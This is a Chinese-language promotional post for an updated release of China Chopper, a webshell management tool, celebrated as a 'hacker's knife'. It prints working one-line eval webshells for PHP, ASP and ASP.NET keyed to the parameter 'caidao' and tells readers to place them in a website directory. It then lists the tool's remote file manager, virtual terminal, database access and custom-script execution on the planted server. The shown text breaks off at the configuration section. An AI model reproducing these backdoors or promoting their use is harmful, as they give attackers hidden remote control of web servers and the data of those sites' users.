0x00 中国制造, 黑客之刀
中国菜刀是中国安全圈内使用非常广泛的一款Webshell管理工具,此次老兵大牛进行了更新,界面更加优美,功能更加丰富,有图有真相!
0x01 验证
此次更新还自带了官网验证功能,妈妈再也不会担心我的webshell了。
0x02 软件说明
菜刀 / Caidao @ http://www.maicaidao.com/
1
|
菜刀,他是一款专业的网站管理工具
|
一、网站管理模块
(1)放在网站上的脚本程序分两种
1.1)“一句话(Eval)”:
PHP, ASP, ASP.NET 的网站都可以,支持https。下面的代码放在网站目录即可开始管理,比FTP好用多了是不是:
1
2
3
|
PHP: <?php @
eval
(
$_POST
[
'caidao'
]);?>
ASP: <%
eval
request(
"caidao"
)%>
ASP.NET: <%@ Page Language=
"Jscript"
%><%
eval
(Request.Item[
"caidao"
],
"unsafe"
);%>
|
1.2)自己开发的脚本程序(Customize):
理论上支持所有动态脚本,只要正确与菜刀进行交互即可。调用方法请参阅后面的 “Customize模式菜刀和服务端通信接口”。
(2)常用功能介绍
1
2
3
4
5
6
7
8
9
10
11
12
13
|
2.1)文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.2)虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。
2.3)数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL,ACCESS, 以及支持ADO方式连接的数据库。
2.4) 自写脚本(只有Eval端才支持):
通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。
如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。
可以在官网下载别人的CCC脚本,或分享你的得意之作。
|
(3)配置框填写说明
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|